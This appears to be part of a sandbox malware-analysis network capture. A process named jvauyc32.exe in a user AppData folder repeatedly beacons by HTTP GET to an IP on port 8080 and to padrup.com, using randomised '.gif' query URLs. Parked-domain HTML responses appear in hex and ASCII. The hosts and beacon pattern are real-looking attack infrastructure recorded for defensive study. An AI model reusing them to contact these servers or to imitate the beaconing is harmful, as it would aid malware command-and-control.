                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:25.649267912 CEST224INData Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
                                                                                                                                                                                                                                                                                          Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODIwNS4zMDg2OjRhN2JjNDVkNjY2YWJlZDAwZDQ1ZWU0ZmJiOTA3ZDcwODc3NmViZjI1ZDllZWNjODM3MDFlZjc5MTM5NDRhMWY6Njc
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:25.649439096 CEST1236INData Raw: 78 4d 6a 4e 69 59 32 51 30 59 6a 55 34 4d 41 3d 3d 27 3b 0a 76 61 72 20 63 6c 69 63 6b 54 72 61 63 6b 69 6e 67 20 3d 20 66 61 6c 73 65 3b 0a 76 61 72 20 74 68 65 6d 65 64 61 74 61 20 3d 20 27 27 3b 0a 76 61 72 20 78 6b 77 20 3d 20 27 27 3b 0a 76
                                                                                                                                                                                                                                                                                          Data Ascii: xMjNiY2Q0YjU4MA==';var clickTracking = false;var themedata = '';var xkw = '';var xsearch = '';var xpcat = '';var bucket = '';var clientID = '';var clientIDs = '';var num_ads = 0;var adtest = 'off';var scriptPath = '';</script>
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:25.649525881 CEST540INData Raw: 7d 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 78 68 72 2e 6f 70 65 6e 28 27 47 45 54 27 2c 20 70 61 74 68 20 2b 20 27 2f 6c 73 2e 70 27 20 2b 20 27 68 70 3f 74 3d 36 37 31 32 33 62 63 64 26 74 6f 6b 65 6e 3d 27
                                                                                                                                                                                                                                                                                          Data Ascii: } } } xhr.open('GET', path + '/ls.p' + 'hp?t=67123bcd&token=' + encodeURI(token), true); xhr.send();};ls(new XMLHttpRequest(), scriptPath, '6a3ab73d558d4e0815787719552036e77146d92a081');</script><script type='


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          38192.168.2.949927190.120.227.918080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:27.471786022 CEST170OUTGET /sobakavolos.gif?16d8692d=1149844359 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: 190.120.227.91:8080
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          39192.168.2.949949185.53.178.5080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:32.202161074 CEST158OUTGET /sobaka1.gif?1781559f=-1928855110 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: padrup.com
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:33.227518082 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Fri, 18 Oct 2024 10:43:33 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          X-Redirect: skenzo
                                                                                                                                                                                                                                                                                          X-Buckets: bucket102
                                                                                                                                                                                                                                                                                          X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_DghzIUS0Yi83i93YoMeOXwnsEAPhmwsZv5V5nZYBXR8+7o+NH1PaSR/YbR08BYT4kY8rkEIrUc+eZUi65DGrIw==
                                                                                                                                                                                                                                                                                          X-Template: tpl_CleanPeppermintBlack_twoclick
                                                                                                                                                                                                                                                                                          X-Language: english
                                                                                                                                                                                                                                                                                          Accept-CH: viewport-width
                                                                                                                                                                                                                                                                                          Accept-CH: dpr
                                                                                                                                                                                                                                                                                          Accept-CH: device-memory
                                                                                                                                                                                                                                                                                          Accept-CH: rtt
                                                                                                                                                                                                                                                                                          Accept-CH: downlink
                                                                                                                                                                                                                                                                                          Accept-CH: ect
                                                                                                                                                                                                                                                                                          Accept-CH: ua
                                                                                                                                                                                                                                                                                          Accept-CH: ua-full-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-arch
                                                                                                                                                                                                                                                                                          Accept-CH: ua-model
                                                                                                                                                                                                                                                                                          Accept-CH: ua-mobile
                                                                                                                                                                                                                                                                                          Accept-CH-Lifetime: 30
                                                                                                                                                                                                                                                                                          X-Pcrew-Ip-Organization: QuadraNet
                                                                                                                                                                                                                                                                                          X-Pcrew-Blocked-Reason: hosting network
                                                                                                                                                                                                                                                                                          X-Domain: padrup.com
                                                                                                                                                                                                                                                                                          X-Subdomain:
                                                                                                                                                                                                                                                                                          Data Raw: 31 65 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
                                                                                                                                                                                                                                                                                          Data Ascii: 1eb<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:33.227554083 CEST1236INData Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
                                                                                                                                                                                                                                                                                          Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODIxMi44ODc2OjY0ZWZmYmZiYzk1OGQwYWI0Y2VhNWE3N2Y2NWE5NzhhY2QyNWUwY2U4MDRkNmRkYzQwOWQ5YjhhYzQ6ee3MWIzMGY6NjcxMjNiZDRkOGI
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:33.227567911 CEST424INData Raw: 74 2e 74 72 69 6d 28 29 20 3d 3d 3d 20 27 27 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                          Data Ascii: t.trim() === '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } }
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:33.227701902 CEST340INData Raw: 39 30 38 37 61 33 30 33 61 36 66 36 62 34 27 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e
                                                                                                                                                                                                                                                                                          Data Ascii: 9087a303a6f6b4');</script><script type='text/javascript' language='JavaScript'>window.onload = function() {if(clickTracking && typeof track_onclick == 'function') track_onclick("6568ca3c198765a2c3c6d04aa2e4186282ac1f83");top.location.h


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          40192.168.2.949955190.120.227.918080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:33.424642086 CEST171OUTGET /sobakavolos.gif?17a69eba=-1120602672 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: 190.120.227.91:8080
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          41192.168.2.949977185.53.178.5080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:37.995996952 CEST156OUTGET /sobaka1.gif?18285ae2=405297890 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: padrup.com
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:39.087029934 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Fri, 18 Oct 2024 10:43:38 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          X-Redirect: skenzo
                                                                                                                                                                                                                                                                                          X-Buckets: bucket102
                                                                                                                                                                                                                                                                                          X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_rriVJoTmCU7L1HNIdt7ucoQArVX9CcAiFVUqwO4lGu3FTFAU4pcP8ia06WA/XfWJwZhoGQ+Mx2s4NDo/zgB8Jw==
                                                                                                                                                                                                                                                                                          X-Template: tpl_CleanPeppermintBlack_twoclick
                                                                                                                                                                                                                                                                                          X-Language: english
                                                                                                                                                                                                                                                                                          Accept-CH: viewport-width
                                                                                                                                                                                                                                                                                          Accept-CH: dpr
                                                                                                                                                                                                                                                                                          Accept-CH: device-memory
                                                                                                                                                                                                                                                                                          Accept-CH: rtt
                                                                                                                                                                                                                                                                                          Accept-CH: downlink
                                                                                                                                                                                                                                                                                          Accept-CH: ect
                                                                                                                                                                                                                                                                                          Accept-CH: ua
                                                                                                                                                                                                                                                                                          Accept-CH: ua-full-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-arch
                                                                                                                                                                                                                                                                                          Accept-CH: ua-model
                                                                                                                                                                                                                                                                                          Accept-CH: ua-mobile
                                                                                                                                                                                                                                                                                          Accept-CH-Lifetime: 30
                                                                                                                                                                                                                                                                                          X-Pcrew-Ip-Organization: QuadraNet
                                                                                                                                                                                                                                                                                          X-Pcrew-Blocked-Reason: hosting network
                                                                                                                                                                                                                                                                                          X-Domain: padrup.com
                                                                                                                                                                                                                                                                                          X-Subdomain:
                                                                                                                                                                                                                                                                                          Data Raw: 31 65 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
                                                                                                                                                                                                                                                                                          Data Ascii: 1e0<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:39.087079048 CEST1236INData Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
                                                                                                                                                                                                                                                                                          Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODIxOC43MjgyOmM0MGJiOWJiYTI1ZjFlNGUwZGU2NDJlMTYwN2VkZWE2NWM1OTQzNzhiYThkOWQ5ODJi6f9NWM2NzM2OWJkZDlkMmI6NjcxMjNiZGFiMWN
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:39.087091923 CEST764INData Raw: 74 2e 74 72 69 6d 28 29 20 3d 3d 3d 20 27 27 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                          Data Ascii: t.trim() === '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } }


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          42192.168.2.949983190.120.227.918080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:39.329504013 CEST171OUTGET /sobakavolos.gif?1847fe9d=-1443367349 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: 190.120.227.91:8080
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          43192.168.2.950001185.53.178.5080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:44.070574999 CEST157OUTGET /sobaka1.gif?18b777d9=-977551672 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: padrup.com
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:45.144809961 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Fri, 18 Oct 2024 10:43:45 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          X-Redirect: skenzo
                                                                                                                                                                                                                                                                                          X-Buckets: bucket102
                                                                                                                                                                                                                                                                                          X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_SZOC0kRKOwaKL6XffhZpMA5kGAKLD05bTnIclwt8thBn3clrtqxxmvx/gNBQhp5DuHPpDPgmB0u2qeYns+NPmw==
                                                                                                                                                                                                                                                                                          X-Template: tpl_CleanPeppermintBlack_twoclick
                                                                                                                                                                                                                                                                                          X-Language: english
                                                                                                                                                                                                                                                                                          Accept-CH: viewport-width
                                                                                                                                                                                                                                                                                          Accept-CH: dpr
                                                                                                                                                                                                                                                                                          Accept-CH: device-memory
                                                                                                                                                                                                                                                                                          Accept-CH: rtt
                                                                                                                                                                                                                                                                                          Accept-CH: downlink
                                                                                                                                                                                                                                                                                          Accept-CH: ect
                                                                                                                                                                                                                                                                                          Accept-CH: ua
                                                                                                                                                                                                                                                                                          Accept-CH: ua-full-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-arch
                                                                                                                                                                                                                                                                                          Accept-CH: ua-model
                                                                                                                                                                                                                                                                                          Accept-CH: ua-mobile
                                                                                                                                                                                                                                                                                          Accept-CH-Lifetime: 30
                                                                                                                                                                                                                                                                                          X-Pcrew-Ip-Organization: QuadraNet
                                                                                                                                                                                                                                                                                          X-Pcrew-Blocked-Reason: hosting network
                                                                                                                                                                                                                                                                                          X-Domain: padrup.com
                                                                                                                                                                                                                                                                                          X-Subdomain:
                                                                                                                                                                                                                                                                                          Data Raw: 37 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
                                                                                                                                                                                                                                                                                          Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:45.144839048 CEST224INData Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
                                                                                                                                                                                                                                                                                          Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODIyNC43ODc5OjRjNDdkOGRjNDgwNjFlNmJmZDFkM2ZjMGJlMmJmZmIxNGYzOTAxMjI1NGM3ZWZkNGMxZWU3YmQyNjQxMzcxYjc6Njc
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:45.144850969 CEST1236INData Raw: 78 4d 6a 4e 69 5a 54 42 6a 4d 44 56 6a 4f 51 3d 3d 27 3b 0a 76 61 72 20 63 6c 69 63 6b 54 72 61 63 6b 69 6e 67 20 3d 20 66 61 6c 73 65 3b 0a 76 61 72 20 74 68 65 6d 65 64 61 74 61 20 3d 20 27 27 3b 0a 76 61 72 20 78 6b 77 20 3d 20 27 27 3b 0a 76
                                                                                                                                                                                                                                                                                          Data Ascii: xMjNiZTBjMDVjOQ==';var clickTracking = false;var themedata = '';var xkw = '';var xsearch = '';var xpcat = '';var bucket = '';var clientID = '';var clientIDs = '';var num_ads = 0;var adtest = 'off';var scriptPath = '';</script>
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:45.144948006 CEST536INData Raw: 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 78 68 72 2e 6f 70 65 6e 28 27 47 45 54 27 2c 20 70 61 74 68 20 2b 20 27 2f 6c 73 2e 70 27 20 2b 20 27 68 70 3f 74 3d 36 37 31 32 33 62 65 31 26 74 6f 6b 65 6e 3d 27 20 2b 20 65
                                                                                                                                                                                                                                                                                          Data Ascii: } } xhr.open('GET', path + '/ls.p' + 'hp?t=67123be1&token=' + encodeURI(token), true); xhr.send();};ls(new XMLHttpRequest(), scriptPath, '2f73150b744e0cfaf755509b20c2b58acf9d0142f8b');</script><script type='text


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          44192.168.2.950007190.120.227.918080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:45.472013950 CEST171OUTGET /sobakavolos.gif?18d65779=-1378065329 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: 190.120.227.91:8080
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          45192.168.2.950027185.53.178.5080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:50.095988989 CEST156OUTGET /sobaka1.gif?195904b8=425264312 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: padrup.com
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:51.117496967 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Fri, 18 Oct 2024 10:43:50 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          X-Redirect: skenzo
                                                                                                                                                                                                                                                                                          X-Buckets: bucket102
                                                                                                                                                                                                                                                                                          X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_PvSpXBwIEVEhXR5qHHt3lDi2zIss+NCDl6o9Qa87RL9GrJqznCi6Ar9lv+3MRgdQLK9oM6bKEnyEYNxZ3dVjAw==
                                                                                                                                                                                                                                                                                          X-Template: tpl_CleanPeppermintBlack_twoclick
                                                                                                                                                                                                                                                                                          X-Language: english
                                                                                                                                                                                                                                                                                          Accept-CH: viewport-width
                                                                                                                                                                                                                                                                                          Accept-CH: dpr
                                                                                                                                                                                                                                                                                          Accept-CH: device-memory
                                                                                                                                                                                                                                                                                          Accept-CH: rtt
                                                                                                                                                                                                                                                                                          Accept-CH: downlink
                                                                                                                                                                                                                                                                                          Accept-CH: ect
                                                                                                                                                                                                                                                                                          Accept-CH: ua
                                                                                                                                                                                                                                                                                          Accept-CH: ua-full-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-arch
                                                                                                                                                                                                                                                                                          Accept-CH: ua-model
                                                                                                                                                                                                                                                                                          Accept-CH: ua-mobile
                                                                                                                                                                                                                                                                                          Accept-CH-Lifetime: 30
                                                                                                                                                                                                                                                                                          X-Pcrew-Ip-Organization: QuadraNet
                                                                                                                                                                                                                                                                                          X-Pcrew-Blocked-Reason: hosting network
                                                                                                                                                                                                                                                                                          X-Domain: padrup.com
                                                                                                                                                                                                                                                                                          X-Subdomain:
                                                                                                                                                                                                                                                                                          Data Raw: 37 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
